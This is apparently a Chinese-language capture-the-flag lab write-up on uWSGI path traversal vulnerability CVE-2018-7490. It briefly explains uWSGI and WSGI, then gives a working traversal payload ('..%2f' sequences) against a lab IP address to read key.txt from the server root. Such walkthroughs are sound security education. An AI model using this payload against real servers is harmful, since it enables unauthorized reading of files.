uWSGI是一個Web服務器,它實現了WSGI協議、uwsgi、http等協議。Nginx中HttpUwsgiModule的作用是與uWSGI服務器進行交換。WSGI是一種Web服務器網關接口。它是一個Web服務器(如nginx,uWSGI等服務器)與web應用(如用Flask框架寫的程序)通信的一種規范。
目標:
了解uWSGI CVE-2018-7490漏洞形成原理和漏洞利用方法。
利用搜索工具了解CVE-2018-7490漏洞詳情。再利用漏洞獲取根目錄key.txt的值。
解析思路
http://219.153.49.228:48001/..%2f..%2fkey.txt
.. 表示上一級
%2f表示/
在IP后面輸入: ..%2f..%2f..%2f..%2f..%2f..%2f..%2fkey.txt